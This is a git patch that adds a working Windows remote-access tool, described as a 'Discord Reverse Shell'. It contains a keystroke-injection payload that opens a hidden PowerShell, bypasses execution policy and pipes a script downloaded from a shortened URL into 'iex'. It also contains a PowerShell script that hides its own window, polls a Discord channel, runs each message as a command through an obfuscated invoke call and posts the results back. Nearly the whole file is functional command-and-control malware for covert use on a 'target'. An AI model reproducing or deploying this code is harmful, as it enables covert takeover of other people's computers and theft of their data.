From 1a2e1c1f729d2e4cf8627376abf55237b9e4b248 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Wed, 27 Mar 2024 15:32:51 +0000 Subject: [PATCH] Add files via upload --- .../Discord-Reverse-Shell.txt | 23 +++ Discord-Reverse-Shell/main.ps1 | 170 ++++++++++++++++++ 2 files changed, 193 insertions(+) create mode 100644 Discord-Reverse-Shell/Discord-Reverse-Shell.txt create mode 100644 Discord-Reverse-Shell/main.ps1 diff --git a/Discord-Reverse-Shell/Discord-Reverse-Shell.txt b/Discord-Reverse-Shell/Discord-Reverse-Shell.txt new file mode 100644 index 0000000..ee1e0dd --- /dev/null +++ b/Discord-Reverse-Shell/Discord-Reverse-Shell.txt @@ -0,0 +1,23 @@ + +REM Title: beigeworm's Discord Reverse Shell. +REM Author: @beigeworm +REM Description: Using a Discord bot along with discords API to Act as a Powershell Terminal. +REM Target: Windows 10 and 11 + +REM SETUP +REM make a discord bot at https://discord.com/developers/applications/ +REM add the bot to your discord server +REM Change BOT_TOKEN below with your bot token +REM Change CHANNEL_ID below to your channel id +REM for more info goto - https://github.com/beigeworm/PoshCord-C2 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; irm https://is.gd/bwdcc2 | iex +ENTER + diff --git a/Discord-Reverse-Shell/main.ps1 b/Discord-Reverse-Shell/main.ps1 new file mode 100644 index 0000000..d1e8515 --- /dev/null +++ b/Discord-Reverse-Shell/main.ps1 @@ -0,0 +1,170 @@ + +<# ============================================= Beigeworm's Discord Reverse Shell ======================================================== + +**SYNOPSIS** +Using a Discord bot along with discords API to Act as a Powershell Terminal. + +INFORMATION +This script uses a discord bot along with discords API to control a windows pc via powershell. +Every 10 seconds it will check for a new message in chat and interpret it as a Powershell command. + +SETUP +1. make a discord bot at https://discord.com/developers/applications/ +2. add the bot to your discord server (with intents enabled and messaging and file upload permissions) +4. Change $tk below with your bot token +5. Change $ch below to the channel id of your webhook. + +USAGE +1. Setup the script +2. Run the script on a target. +3. Check discord for 'waiting to connect..' message. +4. Enter the computername to authenticate the session. +5. Enter commands to interact with the target. + +#> + + +# ================================================================ Discord C2 ====================================================================== + +$token = "$tk" # make sure your bot is in the same server as the webhook +$chan = "$ch" # make sure the bot AND webhook can access this channel + +# =============================================================== SCRIPT SETUP ========================================================================= + +$response = $null +$previouscmd = $null +$authenticated = 0 +$HideWindow = 1 # HIDE THE WINDOW - Change to 1 to hide the console window while running + +function PullMsg { + $headers = @{ + 'Authorization' = "Bot $token" + } + $webClient = New-Object System.Net.WebClient + $webClient.Headers.Add("Authorization", $headers.Authorization) + $response = $webClient.DownloadString("https://discord.com/api/v9/channels/$chan/messages") + + if ($response) { + $most_recent_message = ($response | ConvertFrom-Json)[0] + if (-not $most_recent_message.author.bot) { + $response = $most_recent_message.content + $script:response = $response + $script:messages = $response + } + } else { + Write-Output "No messages found in the channel." + } +} + + +function sendMsg { + param([string]$Message) + $dir = $PWD.Path + $url = "https://discord.com/api/v9/channels/$chan/messages" + $webClient = New-Object System.Net.WebClient + $webClient.Headers.Add("Authorization", "Bot $token") + if ($Message) { + $jsonBody = @{ + "content" = "$Message" + "username" = "$dir" + } | ConvertTo-Json + $webClient.Headers.Add("Content-Type", "application/json") + $response = $webClient.UploadString($url, "POST", $jsonBody) + Write-Host "Message sent to Discord" + } + } + + +Function HideConsole{ + If ($HideWindow -gt 0){ + $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' + $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru + $hwnd = (Get-Process -PID $pid).MainWindowHandle + if($hwnd -ne [System.IntPtr]::Zero){ + $Type::ShowWindowAsync($hwnd, 0) + } + else{ + $Host.UI.RawUI.WindowTitle = 'hideme' + $Proc = (Get-Process | Where-Object { $_.MainWindowTitle -eq 'hideme' }) + $hwnd = $Proc.MainWindowHandle + $Type::ShowWindowAsync($hwnd, 0) + } + } +} + +Function Authenticate{ + if ($response -like "$env:COMPUTERNAME"){ + $script:authenticated = 1 + $script:previouscmd = $response + sendMsg -Message ":white_check_mark: **$env:COMPUTERNAME** | ``Session Started!`` :white_check_mark:" + sendMsg -Message "``PS | $dir>``" + } + else{ + $script:authenticated = 0 + $script:previouscmd = $response + } +} + +# =============================================================== MAIN LOOP ========================================================================= + +HideConsole +PullMsg +$previouscmd = $response +sendMsg -Message ":hourglass: **$env:COMPUTERNAME** | ``Session Waiting..`` :hourglass:" + +while ($true) { + PullMsg + if (!($response -like "$previouscmd")) { + $dir = $PWD.Path + Write-Output "Command found!" + if ($authenticated -eq 1) { + if ($response -like "close") { + $previouscmd = $response + sendMsg -Message ":octagonal_sign: **$env:COMPUTERNAME** | ``Session Closed.`` :octagonal_sign:" + break + } + if ($response -like "Pause") { + $script:authenticated = 0 + $previouscmd = $response + sendMsg -Message ":pause_button: **$env:COMPUTERNAME** | ``Session Paused..`` :pause_button:" + sleep -m 250 + sendMsg -Message ":hourglass: **$env:COMPUTERNAME** | ``Session Waiting..`` :hourglass:" + } + elseif (!($response -like "$previouscmd")) { + $Result = ie`x($response) -ErrorAction Stop + if (($result.length -eq 0) -or ($result -contains "public_flags") -or ($result -contains " ")) { + $script:previouscmd = $response + sendMsg -Message ":white_check_mark: ``Command Sent`` :white_check_mark:" + sleep -m 250 + sendMsg -Message "``PS | $dir>``" + } + else { + $script:previouscmd = $response + $resultLines = $Result -split "`n" + $maxBatchSize = 1900 + $currentBatchSize = 0 + $batch = @() + foreach ($line in $resultLines) { + $lineSize = [System.Text.Encoding]::Unicode.GetByteCount($line) + if (($currentBatchSize + $lineSize) -gt $maxBatchSize) { + sendMsg -Message "``````$($batch -join "`n")``````" + sleep -m 400 + $currentBatchSize = 0 + $batch = @() + } + $batch += $line + $currentBatchSize += $lineSize + } + if ($batch.Count -gt 0) { + sendMsg -Message "``````$($batch -join "`n")``````" + sleep -m 250 + } + sendMsg -Message "``PS | $dir>``" + } + } + } else { + Authenticate + } + } + sleep 5 +} \ No newline at end of file